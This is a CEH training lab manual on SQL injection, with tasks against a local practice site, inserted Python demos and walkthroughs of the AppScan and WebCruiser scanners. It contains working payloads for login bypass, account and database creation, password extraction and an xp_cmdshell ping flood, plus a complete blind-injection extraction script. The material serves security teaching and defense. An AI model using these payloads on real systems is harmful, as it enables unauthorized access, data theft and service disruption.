CEH Lab Manual

SQL Injection
Module 14
Module 14 - SQL Injection

SQL Injection

SQL injection is a technique often used to attack a website. It is the most common website vulnerability on the Internet.

ICON KEY: Valuable information / Test your knowledge / Web exercise / Workbook review

Lab Scenario

A SQL injection attack is carried out by including portions of SQL statements in a web form entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., to dump the database contents to the attacker). SQL injection is a code injection technique that exploits a security vulnerability in a website's software. The vulnerability arises when user input is either incorrectly filtered for string-literal escape characters embedded in SQL statements or is not strongly typed and is unexpectedly executed. SQL commands are thus injected from the web form into the application's database to change its content or to dump information such as credit card numbers or passwords to the attacker. SQL injection is mostly known as an attack vector against websites, but it can be used against any type of SQL database.

As an expert ethical hacker, you must know the defenses: prepared statements with bind variables, whitelist input validation, and escaping. Input validation can detect unauthorized input before it is passed to the SQL query.
Lab Objectives

The objective of this lab is to provide expert knowledge on SQL injection attacks and the related responsibilities, which include:
■ Understanding when and how a web application connects to a database server in order to access data
■ Extracting basic SQL injection flaws
■ Testing web applications for blind SQL injection vulnerabilities
■ Scanning web servers and analyzing the reports
■ Securing information in web applications and web servers

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 14 SQL Injection

Lab Environment

To carry out the lab, you need:
■ A computer running Windows Server 2012
■ Windows 7 running in a virtual machine
■ A web browser with an Internet connection
■ Administrative privileges to configure settings and run tools

CEH Lab Manual Page 782. Ethical Hacking and Countermeasures, Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.
Lab Duration

Time: 50 Minutes

Overview of SQL Injection

SQL injection is a technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a web application for execution by a backend database.

Lab Tasks

Recommended labs to assist you in SQL injection:
■ Performing blind SQL injection
■ Logging on without valid credentials
■ Testing for SQL injection
■ Creating your own user account
■ Creating your own database
■ Directory listing
■ Denial-of-service attacks
■ Testing for SQL injection using the IBM Security AppScan tool

Lab Analysis

Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Lab 1: SQL Injection Attacks on MS SQL Database

SQL injection is a basic attack used either to gain unauthorized access to a database or to retrieve information directly from the database.

Lab Scenario

Today, SQL injection is one of the most common and perilous attacks that a website's software can experience. This attack is performed on SQL databases behind weakly written code, and the vulnerability can be used by an attacker to execute database queries to collect sensitive information, modify database entries, or attach malicious code, resulting in total compromise of the most sensitive data.

As an expert penetration tester and security administrator, you need to test web applications running on the MS SQL Server database for vulnerabilities and flaws.

Lab Objectives

The objective of this lab is to provide students with expert knowledge on SQL injection attacks and to analyze web applications for vulnerabilities. In this lab, you will learn how to:
■ Log on without valid credentials
■ Test for SQL injection
■ Create your own user account
■ Create your own database
■ Perform a directory listing
■ Execute denial-of-service attacks

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 14 SQL Injection

Lab Environment

To carry out the lab, you need:
■ A computer running Windows Server 2012 (Victim Machine)
■ A computer running Windows 8 (Attacker Machine)
■ MS SQL Server must be running under Local System privileges
■ A web browser with an Internet connection

Lab Duration

Time: 30 Minutes

Overview of SQL Injection Attacks

SQL injection is a basic attack used either to gain unauthorized access to a database or to retrieve information directly from the database. It is a flaw in web applications and not a database or web server issue. Most programmers are still not aware of this threat.

Blind SQL injection is used when a web application is vulnerable to SQL injection but the results of the injection are not visible to the attacker. Blind SQL injection is identical to normal SQL injection, except that, when an attacker attempts to exploit an application, rather than seeing a useful error message, a generic custom page is displayed.

Lab Tasks

TASK 1: Log on without Valid Credentials

1. Run this lab in Firefox. It will not work in Internet Explorer.
2. Open a web browser, type http://localhost/realhome and press Enter.
3. The Home page of Real Home appears.

FIGURE 1.1: Old House Restaurant home page

A dynamically generated SQL query is used to retrieve the number of matching rows.

4. Assume that you are new to this site and have never registered with this website previously.
5. Now log in with the code: blah' or 1=1 --
When the attacker enters blah' or 1=1 --, the SQL query looks like this:

SELECT Count(*) FROM Users WHERE UserName='blah' or 1=1 --' AND Password=''

Everything after -- is a comment, so the Password check never runs, and the OR 1=1 condition matches every row in the Users table.

6. Enter any password in the Password field or leave the Password field empty.
7. Click Login or press Enter.

FIGURE 1.2: Old House Restaurant login page

8. You are logged in to the website with a fake login. Your credentials are not valid, but you are logged in. Now you can browse all the web pages of the website as a registered member. You will see a Logout link at the upper corner of the screen.

A user normally enters a user name and password that match a record in the Users table; here the injected condition makes the query match without either.

FIGURE 1.3: Old House Restaurant web page

You have successfully logged on to the vulnerable site without valid credentials.

TASK 2: Creating Your Own User Account

Create a user account using an SQL injection query.

9. Open a web browser, type http://localhost/realhome and press Enter.
10. The home page of Real Home appears.
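The bypass in Task 1, and the bind-variable and whitelist defenses named in the Lab Scenario, side by side. This is an added example, not code from the lab manual or the Real Home application: it uses an in-memory sqlite3 table with two constructed rows in place of the lab's MS SQL Server Users table, and the allow-list pattern for login names is an assumed policy.

```python
import re
import sqlite3

# Constructed stand-in for the Real Home "Users" table.  The lab targets
# MS SQL Server; sqlite3 is used here only so the example runs offline.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Users (UserName TEXT, Password TEXT)")
    db.executemany("INSERT INTO Users VALUES (?, ?)",
                   [("admin", "S3cret!"), ("jsmith", "Demo1234")])
    db.commit()
    return db

def login_vulnerable(db, username, password):
    """The Real Home pattern: untrusted input spliced into the statement text.
    Returns the row count that the page tests against zero."""
    query = ("SELECT Count(*) FROM Users WHERE UserName='" + username +
             "' AND Password='" + password + "'")
    return db.execute(query).fetchone()[0]

def login_safe(db, username, password):
    """Same check with bind variables: the driver sends the values separately
    from the statement text, so quotes and comment markers stay data."""
    query = "SELECT Count(*) FROM Users WHERE UserName=? AND Password=?"
    return db.execute(query, (username, password)).fetchone()[0]

# Whitelist validation as a second layer: a login name is letters, digits
# and underscore only (assumed policy for this example).
USERNAME_RE = re.compile(r"[A-Za-z0-9_]{1,32}")

def username_allowed(username):
    return USERNAME_RE.fullmatch(username) is not None

# The payload typed into the Login Name field in Task 1.
PAYLOAD = "blah' or 1=1 --"

if __name__ == "__main__":
    db = make_db()
    # Vulnerable: the comment marker swallows the password clause and
    # OR 1=1 matches every row, so the count is 2 and the page logs you in.
    print("vulnerable:", login_vulnerable(db, PAYLOAD, ""))
    # Parameterized: no user is literally named "blah' or 1=1 --", count is 0.
    print("safe:      ", login_safe(db, PAYLOAD, ""))
    print("whitelist: ", username_allowed(PAYLOAD), username_allowed("juggyboy"))
```

The parameterized form is the real fix; the allow-list only narrows what reaches the query and would not help for fields that legitimately contain quotes.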
Try to insert a string value where a number is expected in the input field.

FIGURE 1.4: Old House home page

11. Enter the query blah'; insert into login values ('juggyboy','juggy123'); -- in the Login Name field, and enter any password in the Password field or leave the Password field empty. In this query, juggyboy is the username and juggy123 is the password.

To detect SQL injection, check whether the web application connects to a database server in order to access some data.

12. After executing the query you will be redirected to the login page; this is normal.
13. Try juggyboy as the username and juggy123 as the password to log in.
14. Click Login or press Enter.

Error messages are essential for extracting information from the database. Depending on the type of errors found, you can vary the attack techniques.

FIGURE 1.5: Old House Login page

15. If no error message is displayed on the web page, it means that you have successfully created your login using the SQL injection query.
16. To verify whether your login has been created successfully, go to the login page, enter juggyboy in the Login Name field and juggy123 in the Password field, and click Login.

Understanding the underlying SQL query allows the attacker to craft a correct SQL injection.
FIGURE 1.6: Old House Login page

17. You will log in successfully with the created login. Now you can access all the features of the website. Go to the Start menu apps, launch SQL Server Management Studio, and log in with the credentials.

Different databases require different SQL syntax. Identify the database engine used by the server.

FIGURE 1.7: Old House Login page

TASK 3: Create Your Own Database

18. Open a web browser, type http://localhost/realhome and press Enter.
19. The Home page of Real Home appears.
Most injections land in the middle of a SELECT statement. In a SELECT clause, we almost always end up in the WHERE section.

FIGURE 1.8: Old House Home page

20. In the Login Name field, type blah'; create database juggyboy; -- and leave the Password field empty. Click Login.
21. In this query, juggyboy is the name of the database.

Mostly the error messages show you what DB engine you are working on through ODBC errors, which display the database type as part of the driver information.

FIGURE 1.9: Old House Login page

22. No error message or any other message is displayed on the web page. This means that the site is vulnerable to SQL injection and a database named juggyboy has been created on the database server.

Try to replicate an error-free navigation, which can be as simple as submitting ' and '1'='1 and then ' and '1'='2 and comparing the two responses.

23. When you open Microsoft SQL Server Management Studio, under Databases you can see the created database, juggyboy.
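Tasks 2 and 3 both rely on stacked queries: closing the page's SELECT with a semicolon and appending a statement of the attacker's choosing. Whether that works depends on the DBMS and the driver, not only on the concatenation bug. The added example below (not code from the lab manual; constructed sqlite3 data standing in for the lab's MS SQL Server "login" table) runs the Task 2 payload through an API that executes the whole string as a batch, the way an ADO/T-SQL batch does, and through one that accepts a single statement. SQLite has no CREATE DATABASE, so a CREATE TABLE stands in for Task 3.

```python
import sqlite3

# Constructed stand-in for the Real Home "login" table (MS SQL Server in the
# lab; sqlite3 here so the example runs offline).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE login (username TEXT, password TEXT)")
    db.execute("INSERT INTO login VALUES ('admin', 'S3cret!')")
    db.commit()
    return db

def build_login_sql(username, password):
    # String concatenation, as the vulnerable page does.
    return ("SELECT Count(*) FROM login WHERE username='" + username +
            "' AND password='" + password + "'")

def stacked_payload(statement):
    """Close the string and the SELECT, append our own statement, and comment
    out the rest of the page's query (the shape used in Tasks 2 and 3)."""
    return "blah'; " + statement + "; --"

def login_batch(db, username, password):
    """An application that submits the whole string as a batch (executescript
    here; an ADO/T-SQL batch on SQL Server) runs every statement in it."""
    db.executescript(build_login_sql(username, password))

def login_single(db, username, password):
    """An API that accepts exactly one statement refuses the batch outright.
    Returns the match count, or None if the statement was rejected."""
    try:
        return db.execute(build_login_sql(username, password)).fetchone()[0]
    except (sqlite3.ProgrammingError, sqlite3.Warning):
        return None

def user_exists(db, username):
    row = db.execute("SELECT Count(*) FROM login WHERE username=?",
                     (username,)).fetchone()
    return row[0] > 0

def table_exists(db, name):
    row = db.execute("SELECT Count(*) FROM sqlite_master "
                     "WHERE type='table' AND name=?", (name,)).fetchone()
    return row[0] > 0

if __name__ == "__main__":
    db = make_db()
    # Task 2: plant an account through the login field.
    login_batch(db, stacked_payload(
        "insert into login values ('juggyboy','juggy123')"), "")
    print("juggyboy created:", user_exists(db, "juggyboy"))
    # Task 3 analogue: create an object of our own on the server.
    login_batch(db, stacked_payload("create table juggyboy (id INTEGER)"), "")
    print("juggyboy table created:", table_exists(db, "juggyboy"))
    # Single-statement execution rejects the same payload and plants nothing.
    db2 = make_db()
    print("single-statement result:",
          login_single(db2, stacked_payload("insert into login values ('x','y')"), ""))
    print("x created:", user_exists(db2, "x"))
```

The single-statement API still has the injection bug (the string is still concatenated), it just cannot be turned into a stacked write; UNION- and boolean-based attacks against it remain possible, so it is a containment measure, not a fix.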
Time delays are a type of blind SQL injection that causes the SQL engine to execute a long-running query or a time-delay statement, depending on the logic injected.

FIGURE 1.10: Microsoft SQL Server Management Studio

TASK 5: Denial-of-Service Attack

24. Open a web browser, type http://localhost/realhome and press Enter.
25. The Home page of Real Home is displayed.

Once you determine the usernames, you can start gathering passwords:
Username: ' union select password,1,1,1 from users where username='admin'--

FIGURE 1.11: Old House Home page

26. In the Login Name field, type blah'; exec master..xp_cmdshell 'ping www.certifiedhacker.com -l 65000 -t'; -- and leave the Password field empty, then click Login.
27. In the above query, you are running a ping against the www.certifiedhacker.com website through an SQL injection query: -l is the send buffer size, and -t means to ping the specified host until stopped. Note that xp_cmdshell is disabled by default on SQL Server 2005 and later, so this step only works if it has been enabled with sp_configure and the web application's database login has sysadmin rights; on a hardened server the same payload fails.

The attacker then selects the string from the table, as before:
Username: ' union select ret,1,1,1 from foo--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'.
Use the bulk insert statement to read any file on the server, and use bcp to create arbitrary text files on the server.

FIGURE 1.12: Old House Login page

28. The SQL injection query starts pinging the host, and the login page shows a "Waiting for localhost..." message at the bottom left of the window.
29. To see whether the query has executed and ping is running, open the Task Manager window.
30. In Task Manager, under the Details tab, you see a process called PING.EXE running in the background.
31. This process is the result of the SQL injection query that you entered in the login field of the website. PING.EXE runs under the SYSTEM account: xp_cmdshell spawns commands with the SQL Server service account's privileges, which is why the lab requires the service to run as Local System.

Use the sp_OACreate, sp_OAMethod, and sp_OAGetProperty system stored procedures to create OLE Automation (ActiveX) applications that can do everything an ASP script can do.

FIGURE 1.13: Task Manager, Details tab, showing PING.EXE ("TCP/IP Ping Command") running as SYSTEM alongside the SQL Server processes

32. To kill this process manually, right-click the PING.EXE process and select End Process. This stops the pinging of the host.

Lab Analysis

Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure.
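The sidebars in this lab describe blind SQL injection (a generic page instead of an error), the ' and '1'='1 versus ' and '1'='2 comparison used to confirm it, and time delays as an alternative signal. The added example below, which is not code from the lab manual, shows the boolean-based version end to end against a constructed sqlite3 stand-in for the Real Home login page: the only thing the attacker observes is whether the page logs them in, and that one bit is enough to read a column out character by character.

```python
import sqlite3
import string

class LoginOracle:
    """Stand-in for the Real Home login page as seen by a blind attacker:
    the only signal is whether the page logs you in or shows the generic page.
    Constructed sqlite3 data; the lab's real target is MS SQL Server."""

    def __init__(self):
        self.db = sqlite3.connect(":memory:")
        self.db.execute("CREATE TABLE Users (UserName TEXT, Password TEXT)")
        self.db.execute("INSERT INTO Users VALUES ('admin', 'S3cret!')")
        self.requests = 0

    def logged_in(self, username, password=""):
        self.requests += 1
        sql = ("SELECT Count(*) FROM Users WHERE UserName='" + username +
               "' AND Password='" + password + "'")
        return self.db.execute(sql).fetchone()[0] > 0

def is_injectable(oracle, user):
    """The true/false pair from the sidebar: a vulnerable page answers the two
    differently; a page that escapes its input answers both with 'no'."""
    true_case = oracle.logged_in(user + "' AND '1'='1' --")
    false_case = oracle.logged_in(user + "' AND '1'='2' --")
    return true_case and not false_case

# Characters tried at each position; the single quote is left out because it
# would break the probe itself.
ALPHABET = string.ascii_letters + string.digits + "!@#$%^&*()_-+=.,:;/ "

def blind_extract(oracle, user, column, max_len=32):
    """Recover one column value for `user` one character at a time, using
    SUBSTR as the yes/no question.  Stops when no character matches."""
    value = ""
    for pos in range(1, max_len + 1):
        for ch in ALPHABET:
            probe = f"{user}' AND SUBSTR({column},{pos},1)='{ch}' --"
            if oracle.logged_in(probe):
                value += ch
                break
        else:
            break  # past the end of the string
    return value

if __name__ == "__main__":
    o = LoginOracle()
    print("injectable:", is_injectable(o, "admin"))
    print("password:", blind_extract(o, "admin", "Password"))
    print("requests used:", o.requests)
```

Two portability notes for the lab's actual target: SQL Server's default collations are case-insensitive, so compare ASCII(SUBSTRING(...)) values rather than characters, and where even the logged-in/generic distinction is absent the same probe can be turned into the time-based form the sidebar mentions with IF (condition) WAITFOR DELAY '0:0:5'.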
Tool/Utility: SQL Injection Attacks on MS SQL Database

Information Collected/Objectives Achieved:
■ Login id: 1003, 1004
■ Login Username: juggyboy
■ Password: juggy123

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Internet Connection Required: [ ] Yes [x] No
Platform Supported: [x] Classroom [x] iLabs
Lab 2: Testing for SQL Injection Using IBM Security AppScan Tool

IBM Security AppScan is a web application security testing tool that automates vulnerability assessments, prevents SQL injection attacks on websites, and scans websites for embedded malware.

Lab Scenario

By now, you are familiar with the types of SQL injection attacks an attacker can perform and the impact these attacks cause. Attackers can use the following types of SQL injection attacks: authentication bypass, information disclosure, compromised data integrity, compromised availability of data, and remote code execution, which allow them to spoof identity, damage existing data, execute system-level commands to cause denial of service of the application, etc. In the previous lab you learned to test a website backed by an MS SQL database for SQL injection vulnerabilities. As an expert security professional and penetration tester of an organization, your job is to test the company's web applications and web services for vulnerabilities. You need to find various ways to extend security tests, analyze web applications, and employ multiple testing techniques. In this lab you will learn to test for SQL injection attacks using the IBM Security AppScan tool.

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 14 SQL Injection

Lab Objectives

The objective of this lab is to help students learn how to test web applications for SQL injection threats and vulnerabilities. In this lab, you will learn to:
■ Perform website scans for vulnerabilities
■ Analyze scanned results
■ Fix vulnerabilities in web applications
■ Generate reports for scanned web applications

Lab Environment

You can download IBM AppScan from http://www.ibm.com.

To carry out the lab, you need:
■ IBM Security AppScan, located at D:\CEH-Tools\CEHv8 Module 14 SQL Injection\SQL Injection Detection Tools\IBM Security AppScan
■ A computer running Windows Server 2012
■ Double-click SEC_APPS_STD_V8.7_EVAL_WIN.exe to install
■ You can also download the latest version of Security AppScan from http://www-01.ibm.com/software/awdtools/appscan/standard
■ A web browser with Internet access
■ Microsoft .NET Framework Version 4.0 or later

Supported operating systems (both 32-bit and 64-bit editions): Windows 2003 Standard and Enterprise, SP1 and SP2; Windows Server 2008 Standard and Enterprise, SP1 and SP2.

Lab Duration

Time: 20 Minutes

Overview of Testing Web Applications

Web applications are tested to implement security and to automate vulnerability assessments. Doing so helps prevent SQL injection attacks on web servers and web applications. Websites are also tested for embedded malware, and multiple testing techniques are employed.

Lab Tasks

TASK 1: Testing Web Application

1. Follow the wizard-driven installation steps and install the IBM Security AppScan tool.
2. To launch IBM Security AppScan, move your mouse cursor to the lower-left corner of your desktop and click Start.

A personal firewall running on the same computer as Rational AppScan can block communication and result in inaccurate findings and reduced performance. For best results, do not run a personal firewall on the computer that runs Rational AppScan.

FIGURE 2.1: Windows Server 2012 Desktop view
3. Click the IBM Security AppScan Standard app from the Start menu apps.

You can configure Scan Expert to perform its analysis and apply some of its recommendations automatically when you start the scan.

FIGURE 2.2: Windows Server 2012 Start screen

4. The main window of IBM Security AppScan appears; click Create New Scan... to start the scanning.

AppScan can scan both web applications and web services.

FIGURE 2.3: IBM Rational AppScan main window

5. In the New Scan wizard, click the demo.testfire.net hyperlink.

Note: In the evaluation version we cannot scan other websites.

Malware test uses data gathered during the explore stage of a regular scan, so you must have some explore results for it to function.
FIGURE 2.4: IBM Rational AppScan New Scan window (predefined templates: Regular Scan, Quick and Light Scan, Comprehensive Scan, Parameter-Based Navigation, WebSphere Commerce, WebSphere Portal, demo.testfire.net, Hacme Bank)

One of the options in the scan configuration wizard is for Scan Expert to run a short scan to evaluate the efficiency of the new configuration for your particular site.

6. In the Scan Configuration Wizard, select Web Application Scan, and click Next.

FIGURE 2.5: IBM Rational AppScan Scan Configuration Wizard

7. In the URL and Servers options, leave the settings at their defaults and click Next.

There are some changes that Scan Expert can only apply with human intervention, so when you select the automatic option, some changes may not be applied.
FIGURE 2.6: IBM Rational AppScan Scan Configuration Wizard (URL and Servers)

8. In Login Management, select the Automatic option, enter the user name details as Username: jsmith and Password: Demo1234, and click Next.

The total number of tests to be sent, or URLs to be visited, may increase during a scan as new links are discovered.

FIGURE 2.7: IBM Rational AppScan Scan Configuration window (Login Management)

9. In the Test Policy options, click Next to continue.

The Security Issues view shows the actual issues discovered, from overview level down to individual requests and responses. This is the default view.

FIGURE 2.8: IBM Rational AppScan Full Scan window (Test Policy)

10. Click Finish to complete the Scan Configuration Wizard.

Results can display in three views: Security Issues, Remediation Tasks, and Application Data. The view is selected by clicking a button in the view selector. The data displayed in all three panes varies with the view selected.

FIGURE 2.9: Scan Configuration Wizard, Complete page (options: Start a full automatic scan; Start with automatic Explore only; Start with Manual Explore; I will start the scan later; Start Scan Expert when Scan Configuration Wizard is complete)
11. When the Auto Save window prompts you to save automatically during the scan, click Yes to save the file and proceed with the scan.

Auto Save: The scan needs to be saved now because AppScan is set to "Automatically save during scan". Would you like to save the scan now? Click Yes to save the scan now. Click No to disable "Automatically save during scan" for this scan only. Click Disable to disable "Automatically save during scan" for this and future scans.

The Remediation Tasks view provides a To Do list of specific remediation tasks to fix the issues found by the scan.

FIGURE 2.10: Auto Save window

12. Security AppScan starts scanning the provided URL for vulnerabilities.

The Result List displays the issues for whatever item is selected in the application tree. These can be for:
■ Root level: all site issues are displayed
■ Page level: all issues for the page
■ Parameter level: all issues for a particular request to a particular page

FIGURE 2.11: IBM Rational AppScan Scanning Web Application window

Note: It will take a lot of time to scan the complete site; in this lab we have stopped before scanning is complete.

13. After the scan is complete, the application lists all the security issues and vulnerabilities in the website.
14. Results can be displayed in three views: Data, Issues, and Tasks.
15. To view the vulnerabilities and security issues in a particular website, click the Issues tab.

You can export the complete scan results as an XML file or as a relational database. (The database option exports the results into a Firebird database structure. This is open source and follows the ODBC and JDBC standards.)
FIGURE 2.12: IBM Rational AppScan Scanning Web Application Result window

TASK 2: Analyze Result

16. To analyze the scan results, click any of the results, such as SQL Injection, to list all the links that are vulnerable to SQL injection.

The severity level assigned to any issue can be changed manually by right-clicking on the node.

FIGURE 2.13: IBM Rational AppScan Scanning Web Application Result window

Result Expert consists of various modules that are used to process scan results. The processed results are added to the Issue Information tab of the Detail pane, making the information displayed there more comprehensive and detailed, including screenshots where relevant.

17. Click the Advisory tab of that particular link in the bottom pane of the window to see the severity.

The Security Report reports security issues found during the scan. Security information may be very extensive and can be filtered depending on your requirements. Six standard templates are included, but each can easily be tailored to include or exclude categories of information.

FIGURE 2.14: IBM Rational AppScan Scanning Web Application Result window

18. To fix these threats and vulnerabilities, click Fix Recommendation to view a list of advice for fixing these vulnerabilities.

FIGURE 2.15: IBM Rational AppScan Scanning Web Application Result window
TASK 3: Generate Report

19. After Rational AppScan assesses your site's vulnerability, you can generate customized reports configured for the various personnel in your organization.

20. You can open and view the reports from within Security AppScan, and you can save a report as a file to be opened with a third-party application.

21. To generate a report, select Tools -> Report.... The Create Report window appears.

The Industry Standard Report reports the compliance (or non-compliance) of your application with a selected industry committee or your own custom standards checklist.

The Template Based Report is a custom report containing user-defined data and user-defined document formatting in Microsoft Word .doc format.

FIGURE 2.16: IBM Rational AppScan Report Option window

22. Select the type of report to generate, check the options, and click Save Report....

[Screenshot: the Create Report window offers the report types Security, Industry Standard, Regulatory Compliance, Delta Analysis and Template Based.]

The Delta Analysis report compares two sets of scan results and shows the difference in URLs and/or security issues discovered.

The Regulatory Compliance Report reports on the compliance (or non-compliance) of your application with a large choice of regulations or legal standards, or with your own custom template.

FIGURE 2.17: IBM Rational AppScan Create Report window

23. Save the report to the desired location. The saved report will be helpful for future guidance.

Lab Analysis

Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure.
Tool/Utility: IBM Security AppScan
Information Collected/Objectives Achieved:
■ SQL Injection attack detected

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions

1. Analyze how to speed up the scanning process and reduce the number of pages that IBM Rational AppScan finds.
2. Evaluate whether it is possible to perform scans against live production environments with IBM Rational AppScan. Will that cause damage or hurt the site?
3. Analyze how variables can be implemented in a multi-step sequence with IBM Rational AppScan.

Internet Connection Required
☑ Yes ☐ No

Platform Supported
☐ iLabs
Testing for SQL Injection Using WebCruiser Tool

WebCruiser - Web Vulnerability Scanner is an effective and powerful web penetration testing tool that will aid you in auditing your website. It has a Vulnerability Scanner and a series of security tools.

Lab Scenario

A deeper understanding of detecting SQL injection attacks using the IBM Security AppScan tool was gained in the previous lab. In this lab we will look at a real case in which SQL injection attacks were used to steal confidential information from banks. Albert Gonzalez, an indicted hacker, stole 130 million credit and debit cards, the biggest identity theft case ever prosecuted in the United States. He used SQL injection attacks to install sniffer software on the companies' servers to intercept credit card data as it was being processed. He was charged in many different cases, in which the methods of hacking utilized were:
■ Structured Query Language ("SQL") was a computer programming language designed to retrieve and manage data on computer databases.
■ "SQL Injection Attacks" were methods of hacking into and gaining unauthorized access to computers connected to the Internet.
■ "SQL Injection Strings" were a series of instructions to computers used by hackers in furtherance of SQL Injection Attacks.
■ "Malware" was malicious computer software programmed to, among other things, identify, store, and export information on computers that were hacked, including information such as credit and debit card numbers and corresponding personal identification information of cardholders ("Card Data"), as well as to evade detection by anti-virus programs running on those computers.

As an expert security professional and penetration tester you should have a complete understanding of SQL injection attack scenarios, list high-risk components, and note entry points to start testing and exploring. Hence, as another aspect of SQL injection testing, in this lab you will be guided to test for SQL injection using the WebCruiser tool.

Lab Objectives

The objective of this lab is to help students learn how to test web applications for SQL injection threats and vulnerabilities. In this lab, you will learn to:
■ Perform website scans for vulnerabilities
■ Analyze scanned results
■ Fix vulnerabilities in web applications
■ Generate reports for scanned web applications

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 14 SQL Injection.

Lab Environment

You can download WebCruiser from http://sec4app.com/download.

To carry out the lab, you need:
■ WebCruiser, located at D:\CEH-Tools\CEHv8 Module 14 SQL Injection\SQL Injection Detection Tools\WebCruiser
■ Run this tool in Windows Server 2012
■ You can also download the latest version of WebCruiser from http://sec4app.com/download.htm
■ A web browser with Internet access
■ Microsoft .NET Framework Version 4.0 or later

WebCruiser can also produce a time-consuming SQL sentence and obtain information from the response time of the link.

Lab Duration

Time: 20 Minutes

Overview of Testing Web Applications

Web applications are tested for implementing security and automating vulnerability assessments. Doing so prevents SQL injection attacks on web servers and web applications. Websites are tested for embedded malware and to employ multiple testing techniques.

TASK 1: Testing Web Application

Lab Tasks

1. To launch WebCruiser on your Windows Server 2012 host machine, navigate to D:\CEH-Tools\CEHv8 Module 14 SQL Injection\SQL Injection Detection Tools\WebCruiser.

2. Double-click WebCruiserWVS.exe to launch it.
[Screenshot: WebCruiser main window. Its built-in help text reads: "Scanning is not necessary for SQL Injection POC, you can launch POC by input the URL directly, or launch from the Scanner. WebCruiser support: GET/Post/Cookie Injection; SQL Server: Plain Text/FieldEcho(Union)/Blind Injection; MySQL/DB2/Access: FieldEcho(Union)/Blind Injection; Oracle: FieldEcho(Union)/Blind/CrossSite Injection."]

FIGURE 3.1: WebCruiser main window

3. Enter the URL that you want to scan; in this lab we are scanning http://10.0.0.2/realhome/ (this IP address is where the realhome website is hosted).

WebCruiser Web Vulnerability Scanner for iOS is an effective and convenient web penetration testing tool that will aid you in auditing your website. WebCruiser can currently find the following web vulnerabilities:
* GET SQL Injection (Int, String, Search)
* POST SQL Injection (Int, String, Search)
* Cross Site Scripting (XSS)

It can support scanning a website as well as POC (Proof of Concept) for web vulnerabilities: SQL Injection, Cross Site Scripting, XPath Injection, etc. So WebCruiser is also an automatic SQL injection tool, an XPath injection tool, and a Cross Site Scripting tool.

FIGURE 3.2: WebCruiser Scanning a site

4. A software disclaimer pop-up will appear; click OK to continue.
[Screenshot: the Confirm dialog reads "Software Disclaimer: Authorization must be obtained from the web application owner; This program will try to get each link and post any data when scanning; Backup the database before scanning so as to avoid disaster; Using this software at your own risk. Login as a legal user will help you find vulnerabilities to the most extent. But not login is better if you intend to scan the login/authentication page. Continue?" with OK and Cancel buttons.]

System Requirement: .NET Framework V2.0 or higher; you can download .NET Framework V2.0 from Microsoft.

FIGURE 3.3: WebCruiser Software Disclaimer pop-up

5. WebCruiser starts the URL scan as shown in the following screenshot. It shows the Site Structure, and the table below it lists the vulnerabilities.

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.

[Screenshot: the scan result shows the realhome site tree (Login.aspx, Index.aspx and script files) and a vulnerability table with two POST SQL INJECTION findings against http://10.0.0.2/realhome/Login.aspx, parameter type String, keyword "float".]

FIGURE 3.4: WebCruiser Scanning Vulnerabilities

6. Right-click each of the vulnerabilities displayed in the scan result, and then you can launch the SQL Injection POC (Proof of Concept).
It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL Injection is one of the most common application layer attack techniques used today.

[Screenshot: right-clicking a finding offers Copy URL To ClipBoard, SQL INJECTION POC and Delete Vulnerability.]

FIGURE 3.5: WebCruiser SQL Injection POC (Proof of Concept)

7. This will launch the SQL injection POC and fill in the relevant fields. Click Get Environment Information.

[Screenshot: the POC tool shows the URL http://10.0.0.2/realhome/Login.aspx, the POST data, DataBase: UnKnown, KeyWord: float and Injection Type: String, with tabs for Environment, DataBase, Command, FileReader, HttpUploader, StringEncoder and Debug.]

There are many methods of getting data in SQL Injection, but not all of these methods are supported in an actual penetration test.

FIGURE 3.6: WebCruiser SQL Injection POC Tool

8. It will display the environment information of the host where the site is hosted.

Lab Analysis

Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure.

Tool/Utility: WebCruiser
Information Collected/Objectives Achieved:
■ SQL Injection Detected
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions

1. Analyze how to speed up the scanning process and reduce the number of pages that IBM Rational AppScan finds.
2. Evaluate whether it is possible to perform scans against live production environments with IBM Rational AppScan. Will that cause damage or hurt the site?
3. Analyze how variables can be implemented in a multi-step sequence with IBM Rational AppScan.

Internet Connection Required
☐ Yes ☐ No

Platform Supported
☑ Classroom ☑ iLabs
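The findings WebCruiser reported rest on the defect its margin note names: user text spliced into the SQL statement, or untyped input reaching the database engine. As an added example (not code from the lab manual, WebCruiser or the realhome site), the Python below puts the defective query next to its parameterized fix and runs the error-based and true/false checks a scanner performs from the outside, against a constructed in-memory SQLite table standing in for the lab's SQL Server; the user names and passwords are made up.

```python
"""Constructed demo (not from the lab manual or any of its tools): a login
query that splices user text into the SQL and a numeric lookup that is never
type-checked, each beside its parameterized fix, plus the error-based and
true/false checks a scanner uses to flag them. SQLite stands in for the lab's
MS SQL Server; every name and password below is made up."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the lab site's user table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (id, username, password) VALUES (?, ?, ?)",
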